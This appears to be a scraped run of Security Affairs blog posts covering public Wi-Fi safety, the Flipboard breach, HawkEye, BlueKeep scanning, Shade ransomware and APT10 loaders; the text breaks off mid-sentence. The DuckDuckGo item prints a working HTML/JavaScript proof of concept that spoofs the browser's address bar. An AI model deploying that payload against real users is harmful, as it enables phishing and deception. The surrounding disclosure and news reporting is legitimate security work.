Always keep your device Wi-Fi turned off when you are in public places and enable it only when needed. This may seem like an unnecessary hassle for frequent internet users but it is a mandatory thing to do while in public. If your device Wi-Fi is turned on, it can catch signals from all the available Wi-Fi in your surroundings and will automatically get connected to any open public Wi-Fi. Your device is at constant risk of connecting with malicious networks and getting affected by Worms when it’s Wi-Fi is active all the time.

  • Never Connect with Unknown Wi-Fi

Password protected public Wi-Fi are a bit safer than the open public Wi-Fi and are better to opt for. When a Wi-Fi is protected by a password it ensures that only authorized people can get access to the network and reduces the chances of having hackers on the same network. But if you really need to get connected to an open public Wi-Fi always confirm the name of the Wi-Fi with relevant people around. All the rogue Wi-Fi hotspot usually use similar names as the actual business Wi-Fi and you can easily fell prey to them if you are not cautious.

  • Browse Safely

You must always be cautious while browsing any site on the internet as it is a world full of scams and cons. The risk turns multifold when you are using public Wi-Fi to access the unauthorized site. All the sites that are authorized and provide data encryption begin with HTTPS. These sites have SSL connection and are marked by a lock sign in the address bar. Sites without SSL connection do not take any responsibility of data shared through their sites which is definitely a risk factor and this threat increases if your Wi-Fi connection is unsafe too.

  • Be Vigilant While Sharing Information

When you are on public Wi-Fi, all the data transactions to and fro your device is vulnerable to spying and snooping. Be vigilant about what you share while on public Wi-Fi and never carry out any important transaction through open networks. Remember your bank details and crucial business documents should not be risked due to mere negligence.

Also, limit your social media surfing through public hotspots as it paved the way for predators to your personal information. Logging in through a public network also provides cybercriminals easier access to our account details and password and make your accounts vulnerable to hacking. To stay safe, log in to your accounts only if needed and sign out as soon as your task is done.

  • Opt for VPN

VPN is the safest mode of surfing the internet and provides the best cybersecurity. It is a Virtual Private Network that allocates you an anonymous proxy that is usually located at a different place than your current location. It allows you to camouflage your actual identity and geographical location and keeps you safe from predators and spies.

VPN also provides an encrypted tunnel for all your online transactions and encode them in a way that nobody can access any piece of information during the transaction from one end to another. It eliminates all chances of peeking and snooping by any means.

Virtual Private Network also creates a shield between your device and incoming traffic and keeps malware and viruses at bay. Though it’s usually a paid service it is worth investing in.

  • Secure Your Device

As much as your connection needed to be secure, your device needs safety shields too. Protect your device by enabling the firewall on your device. It’s pop up notifications may be annoying but it will serve the purpose of protective shield for your device against data based malware threats. Even if you prefer to keep your device firewall turned off most of the time, enable it at least while using public Wi-Fi.

Anti-virus and anti-malware software is a must for your device security. It protects your device from invading viruses and alerts you if there is any suspicious activity in your device. Investing in an updated version of anti-virus software becomes more crucial if you use public Wi-Fi quite often on your device.

  • Forget the Network

Whenever you connect with any public Wi-Fi remove the Wi-Fi and password from your device when you leave the place. Saved Wi-Fi is usually auto connected when comes in contact with the device again without alerting you and this may become a threat for your device security.

To Conclude

Public Wi-Fi cannot be avoided completely. They provide you with the facility to connect with the word while on the go and without paying any money. This free service is available at all places from educational institutes to institutional buildings. Whether you are out of your home country for business purposes or enjoying vacations abroad, free public Wi-Fi is certainly a blessing.

There are a number of threats associated with public Wi-Fi especially the ones without any password protection but you can keep yourself safe by following simple precautionary measures. These safety tips protect you from the general tricks and scams of hackers. But if you are a frequent public Wi-Fi user you must invest in paid VPN and authentic anti-virus software for complete security of your device and online transactions.




If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

About Author:

About Writer: Susan Alexandra is is a cybersecurity and privacy enthusiast. She is a small business owner, traveler and investor of cryptocurrencies. Susan’s inbox is open for new ideas and stories, you can share the story ideas to susanalexandra67(at)gmail(dot)com

Pierluigi Paganini

(Security Affairs – Public Wi-Fi, hacking)

The post Using Public Wi-Fi? Your data can be hacked easily! Here’s How… appeared first on Security Affairs.

News aggregator Flipboard disclosed a data breach

The news aggregator Flipboard announced that it suffered a breach, unauthorized users had access to some databases storing user account information.

The news and social media aggregator Flipboard disclosed on Tuesday that it suffered a breach, unauthorized users had access to some databases storing user information.

Hackers had access to the company systems between June 2, 2018, and March 23, 2019, and again on April 21-22, 2019. On April 23, the internal staff noticed suspicious activity in its infrastructure.

“We recently identified unauthorized access to some of our databases containing certain Flipboard users’ account information, including account credentials,” reads the incident notice published by Flipboard. “In response to this discovery, we immediately launched an investigation and an external security firm was engaged to assist. Findings from the investigation indicate an unauthorized person accessed and potentially obtained copies of certain databases containing Flipboard user information between June 2, 2018 and March 23, 2019 and April 21 – 22, 2019.”

Flipboard data breach

Flipboard have more than 145 million users and hackers have exfiltrated their data. Stolen records include names, usernames, password hashes, email addresses, and for some users digital tokens used to access Flipboard through third-party services.

Flipboard said that most of the passwords were hashed with bcrypt, while the passworts for users that have not logged into their account since March 14, 2012, were protected with SHA-1 hashing algorithm and uniquely salted.

Flipboard has not found any evidence the hackers accessed third-party accounts connected to users’ accounts, anyway as a precaution, the company replaced or deleted all digital tokens. At the time it is not clear the extent of the breach, anyway, the company forced a password reset for all its users.

The news aggregator pointed out that it does not collect users’ data, this means that the data breach did not expose sensitive data.

“Notably, Flipboard does not collect from users, and this incident did not involve, government issued IDs (such as Social Security numbers or driver’s license numbers), or payment card, bank account, or other financial information.” continues the security notice.

Flipboard reported the incident to the authorities and hired a security firm to help with the investigation.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

The post News aggregator Flipboard disclosed a data breach appeared first on Security Affairs.

HawkEye Keylogger is involved in attacks against business users

Experts at IBM X-Force observed a new campaign involving the HawkEye keylogger in April and May 2019 aimed at business users. 

Malware attacks leveraging a new variant of the HawkEye keylogger have been observed by experts at Talos. The malware has been under active development since at least 2013 and it is offered for sale on various hacking forums as a keylogger and stealer. It allows to monitor systems and exfiltrate information.

The latest variant appeared in the cybercrime underground in December 2018, it was named HawkEyeReborn v9. The author is selling it through a licensing model and is also offering access to updates for specific periods of time.

“IBM X-Force researchers report an increase in HawkEye v9 keylogger infection campaigns targeting businesses around the world.” reads the analysis published by Cisco Talos. “In campaigns observed by X-Force in April and May 2019, the HawkEye malware focused on targeting business users, aiming to infect them with an advanced keylogging malware that can also download additional malware to their devices. “

In April 2019, threat actors launched numerous campaigns aimed at targeting industries such as transportation and logistics, healthcare, import and export, marketing, agriculture, and others. 

Attackers delivered the keylogger through malspam campaigns focused on business users. The messages pose as messages sent from a large bank in Spain or fake emails from legitimate companies or from other financial institution.

“X-Force researchers note that the infection process is based on a number of executable files that leverage malicious PowerShell scripts.” continues the post.

Experts noticed that the malspam campaign is originated from Estonia, the malware while experts observed infections worldwide.

A few campaigns X-Force analyzed in April and May 2019 show that the infrastructure the malspam came from is hosted on similar assets.” concludes Cisco. “It is possible that HawkEye operators further pay for other services from the malware’s vendor, or from another cybercrime vendor serving up spamming campaigns,” IBM concluded.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – HawkEye, hacking)

 

The post HawkEye Keylogger is involved in attacks against business users appeared first on Security Affairs.

DuckDuckGo Address Bar Spoofing

The DuckDuckGo Privacy Browser application 5.26.0 for Android allows address bar spoofing via a setInterval call, as demonstrated by reloading every 50 ms.

Technical Observation: A browser that’s scoring in the 50,00,000+ tier of Android download.It was observed that the DuckDuckGo privacy browser ominibar can be spoofed by a crafted javascript page spoofing `setInterval` function and reloading the URL in every 10 to 50 ms.

Proof of concept: (Gist)

<html><body>
<title>DuckDuckGo — Privacy, simplified.</title>
<head><style>
p.b {
    font-family: Arial, Helvetica, sans-serif;
    }
</style></head><p class="b"><body bgcolor="#5DBCD2">
<h1 style="text-align:center;">We defintiely store your <br> personal information. Ever.</h1>
<p style="text-align:center;">Our privacy policy is simple: we collect and share any of your personal 
information to 3rd parties.</p> </p><img src="https://duckduckgo.com/assets/onboarding/bathroomguy/4-alpinist-v2.svg"> <script> function fakefuntion() { location = "https://duckduckgo.com/" } setInterval("fakefuntion()", 50); </script></body></html>

The actual magic happens at `fakefunction()` above-crafted javascript file loads the real www.duckduckgo.com in a loop of every 50 ms whereas the inner HTML can be modified accordingly.

DuckDuckGo flaw

The above PoC shows the demonstration of the successful attack.
Timeline:
This issue was submitted to DuckDuckGo team via HackerOne on Oct 31st, 2018, DuckDuckGo rewarded with a swag on Nov 13th, 2018 but the issue was closed without a fix which says “team doesn’t view it as a serious issue” and report was marked as informative. Further CVE-2019-12329 was assigned to this issue.

About the Author: Security Researcher Dhiraj Mishra (@mishradhiraj)

Original post at:

https://www.inputzero.io/2019/05/duckduckgo-address-bar-spoofing.html


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Address Bar Spoofing, hacking)

The post DuckDuckGo Address Bar Spoofing appeared first on Security Affairs.

Internet scans found nearly one million systems vulnerable to BlueKeep

Roughly one million devices are vulnerable to attacks exploiting the BlueKeep Windows vulnerability and hackers are ready to hit them.

Yesterday I reported the discovery made by experts at GreyNoise that detected scans for systems vulnerable to the BlueKeep (CVE-2019-0708) vulnerability.

The scans were first detected on May 25, 2019, experts explained that a single threat actor launched them from the Tor network to hide their identities.

Bad Packets researchers also observed scanning activity associated with the BlueKeep, most of the requests originated from the Netherlands, Russia. and China.

The vulnerability, tracked as CVE-2019-0708, impacts the Windows Remote Desktop Services (RDS) and was addressed by Microsoft with May 2019 Patch Tuesday updates. BlueKeep is a wormable flaw that can be exploited by malware authors to create malicious code with WannaCry capabilities.

As explained by Microsoft, this vulnerability could be exploited by malware with wormable capabilities, it could be exploited without user interaction, making it possible for malware to spread in an uncontrolled way into the target networks.

Many security experts have already developed their own exploit code for this issue without publicly disclosing it for obvious reasons.

Microsoft has released patches for Windows 7, Server 2008, XP and Server 2003. Windows 7 and Server 2008 users can prevent unauthenticated attacks by enabling Network Level Authentication (NLA), and the threat can also be mitigated by blocking TCP port 3389.

Experts at the SANS Institute observed two partial exploits that are publicly available. Chaouki Bekrar, the founder of zero-day broker firm Zerodium, explained that the flaw can be exploited remotely by an unauthenticated user to gain access to a device with SYSTEM privileges. Researchers at McAfee developed a PoC exploit that could be exploited to get remote code execution.

Other experts also announced to have successfully developed exploits for BlueKeep, including KasperskyCheck Point, and MalwareTech.

Now the popular expert Robert Graham has scanned the Internet for vulnerable systems. He discovered more than 923,000 potentially vulnerable devices using the masscan port scanner and a modified version of rdpscan,  

The initial scan executed with masscan lasted a couple of hours and allowed the expert to find all the devices running Remote Desktop, roughly 7,629,102 results.

“However, there is a lot of junk out there that’ll respond on this port. Only about half are actually Remote Desktop.” explained Graham.
Masscan only finds the open ports, but is not complex enough to check for the vulnerability. Remote Desktop is a complicated protocol. A project was posted that could connect to an address and test it, to see if it was patched or vulnerable. I took that project and optimized it a bit, rdpscan, then used it to scan the results from masscan. It’s a thousand times slower, but it’s only scanning the results from masscan instead of the entire Internet.”

The scan revealed 923,671 potentially vulnerable systems, likely hackers will launch a massive offensive in the next weeks.

“The upshot is that these tests confirm that roughly 950,000 machines are on the public Internet that are vulnerable to this bug. Hackers are likely to figure out a robust exploit in the next month or two and cause havoc with these machines. ” Graham added.

Below the detailed results of the scans conducted by the expert:

  • 1447579  UNKNOWN – receive timeout
  • 1414793  SAFE – Target appears patched
  • 1294719  UNKNOWN – connection reset by peer
  • 1235448  SAFE – CredSSP/NLA required 
  • 923671  VULNERABLE — got appid 
  • 651545 UNKNOWN – FIN received
  • 438480  UNKNOWN – connect timeout 
  • 105721  UNKNOWN – connect failed 9
  • 82836  SAFE – not RDP but HTTP 
  • 24833  UNKNOWN – connection reset on connect   
  • 3098  UNKNOWN – network error   
  • 2576  UNKNOWN – connection terminated

Summarizing, over 1.4 million machines have been patched and 1.2 million devices refused any unauthenticated connection.

Let’s close confirming the availability of the micropatch for the BlueKeep vulnerability that was released by experts at 0patch that can be deployed by administrators to protect always-on servers.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – BlueKeep, hacking)

The post Internet scans found nearly one million systems vulnerable to BlueKeep appeared first on Security Affairs.

Shade Ransomware is very active outside of Russia and targets more English-speaking victims

Experts at PaloAlto Networks spotted a new Shade ransomware campaigns targeting news countries, including in the U.S. and Japan.

Researchers observed a new wave of Shade ransomware attacks against targets in several countries, including the US and Japan.

Shade is considered one of the most dangerous threats in the cyber crime scenario, it has been active at least since 2014 when a massive infection was observed in Russian. The Shade infections increased during October 2018, keeping a constant trend until the second half of December 2018, taking a break around Christmas, and then resuming in mid-January 2019 doubled in size.

“Our results indicate the majority of recent Shade executables have also targeted users outside of Russia.” reads the analysis published by Paloalto Networks.

“In fact, our research shows that the top five countries affected by Shade ransomware are not Russia or nations of the former Soviet Union, they are the United States, Japan, India, Thailand, and Canada,” 

Moth of the victims belongs to high-tech, wholesale and education sectors.

Shade has been distributed through malspam campaigns and exploit kits, experts pointed out that its executable (EXE) remains “remarkably consistent” since its discovery in 2014.

Once a Windows system gets infected with this ransomware, the malicious code sets the desktop background to announce the infection. The ransomware also drops on the Desktop 10 text files, named README1.txt through README10.txt,

“Attention! All the important files on your disks were encrypted. The details can be found in README.txt files which you can find on any of your disks.” reads the message left on the background.

Shade Ransomware 2

The README.txt files include instructions to contact the crooks via an email address in order to receive information on how to make the payments.

The researchers noticed that all the Malspam campaigns spreading the Shade ransomware were retrieving an executable file from a compromised server.

“By focusing on the executable in this chain of events, we can determine where Shade ransomware infection attempts have occurred.” continues the report.

“AutoFocus has a Shade ransomware tag that identifies any items associated with Shade.” explains PaloAlto Networks. “We searched on attempted deliveries of a Shade ransomware executable during an infection chain, and we focused our search on packed executable (PE) files sent through a URL over TCP port 80.”

Experts discovered that most of the URLs hosting Shade ransomware executables were reported from customer devices outside of Russia and Russian language countries.

Technical details, including Indicators of Compromise (IoCs) are reported in the analysis published by the experts.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Shade, ransomware, malware)

The post Shade Ransomware is very active outside of Russia and targets more English-speaking victims appeared first on Security Affairs.

Siemens Healthineers medical products vulnerable to Windows BlueKeep flaw

Several products made by Siemens Healthineers are affected by a recently patched Windows BlueKeep vulnerability (CVE-2019-0708).

The BlueKeep issue is a remote code execution vulnerability in Remote Desktop Services (RDS) that it can be exploited by an unauthenticated attacker by connecting to the targeted system via the RDP and sending specially crafted requests.

As explained by Microsoft, this vulnerability could be triggered by malware with wormable capabilities, it could be exploited without user interaction, making it possible for malware to spread in an uncontrolled way into the target networks.

Several security experts have already developed their own exploit code for this issue without publicly disclosing it for obvious reasons.

After the release of security updates for the BlueKeep, Siemens started assessing its Healthineers products. Now Siemens has published six security advisories to warn its customers of potential risks,

“Some Siemens Healthineers software products are affected by this vulnerability.” reads an advisory published by Siemens. “The exploitability of the vulnerability depends on the specific configuration and deployment environment of each product. Siemens Healthineers recommends installing the appropriate security patches released by Microsoft.”

The company pointed out that it cannot guarantee the compatibility of Microsoft security patches with products from Siemens Healthineers that are beyond their End of Support.

siemens healthineers bluekeep

Impacted products include MagicLinkA, MagicView, Medicalis solutions, Screening Navigator, syngo solutions and teamplay (receiver software only).

For most of the products, the advisories suggest disabling RDP, blocking TCP port 3389, and implementing workarounds suggested by Microsoft.

Siements also recommends to ensure to have appropriate backups and system restoration procedures, and suggest to contact local Siemens Healthineers customer service engineer, portal or our Regional Support Center for remediation guidance information.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Healthineers, BlueKeep)

The post Siemens Healthineers medical products vulnerable to Windows BlueKeep flaw appeared first on Security Affairs.

APT10 is back with two new loaders and new versions of known payloads

The APT10 group has added two new malware loaders to its arsenal and used in attacks aimed at government and private organizations in Southeast Asia.

In April 2019, China-linked cyber-espionage group tracked as APT10 has added two new loaders to its arsenal and used it against government and private organizations in Southeast Asia.

The group has been active at least since 2009, in April 2017 experts from PwC UK and BAE Systems uncovered a widespread hacking campaign, tracked as Operation Cloud Hopper, targeting managed service providers (MSPs) in multiple countries worldwide.

In July 2018, FireEye observed a series of new attacks of the group leveraging spear-phishing emails using weaponized Word documents that attempt to deliver the UPPERCUT backdoor, also tracked as ANEL.

In September 2018, researchers from FireEye uncovered and blocked a campaign powered by the Chinese APT10 cyber espionage group aimed at Japanese media sector

The recent attacks were uncovered by experts at enSilo, they also noticed that the APT group used modified versions of known malware.

“Towards the end of April 2019, we tracked down what we believe to be new activity by APT10, a Chinese cyber espionage group.” reads the analysis published by enSilo. “Both of the loader’s variants and their various payloads that we analyzed share similar Tactics, Techniques, and Procedures (TTPs) and code associated with APT10.”

The two loaders deliver different payloads to the victims and both variants drop the following files beforehand:

  • jjs.exe – legitimate executable, a JVM-based implementation of a javascript engine as part of the Java platform that acted as a loader for the malware.
  • jli.dll – malicious DLL
  • msvcrt100.dll – legitimate Microsoft C Runtime DLL
  • svchost.bin – binary file

Both variants served several final payloads, including the PlugX and Quasar remote access trojan (RAT).

APT10 chinese hackers

The loaders implement DLL Side-Loading, this means it starts by running a legitimate executable which is abused to load a malicious DLL.

Both loaders use the jli.dll library that maps a data file, svchost.bin, to memory and decrypts it to retrieve a shellcode that is injected into svchost.exe and contains the actual malicious payload.

The two loaders differ in the way they ensure persistence, the first uses a service as its persistence method, while the second variant leverages the Run registry key for the current user under the name “Windows Updata” . 

“It goes a long way to completely remove any sign of McAfee’s email proxy service from the infected machine,” Hunter said. “Besides killing the process, it also makes sure to delete any related keys in the registry, and recursively deletes any related files and directories on the machine. The same behavior was observed by in the paranoid variant as part of a VBScript the dropper runs.”

Experts noticed that the payloads used by the attackers in the last campaigns are still on a development phase.

“Both variants of the loader implement the same decryption and injection mechanism.” concludes the experts.

Further technical details, including IoCs, are reported in the analysis published by inSile.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – APT10, hacking)

The post APT10 is back with two new loaders and new versions of known payloads appeared first on Security Affairs.

BlueKeep scans observed from exclusively Tor exit nodes

GreyNoise experts detected scans for systems vulnerable to the BlueKeep (CVE-2019-0708) vulnerability from exclusively Tor exit nodes.

Microsoft Patch Tuesday updates for May 2019 address nearly 80 vulnerabilities, including an RDS vulnerability dubbed BlueKeep that can be exploited to carry out WannaCry-like attack.

The issue is a remote code execution flaw in Remote Desktop Services (RDS) that it can be exploited by an unauthenticated attacker by connecting to the targeted system via the RDP and sending specially crafted requests.

As explained by Microsoft, this vulnerability could be exploited by malware with wormable capabilities, it could be exploited without user interaction, making it possible for malware to spread in an uncontrolled way into the target networks.

Several security experts have already developed their own exploit code for this issue without publicly disclosing it for obvious reasons.

Experts at the SANS Institute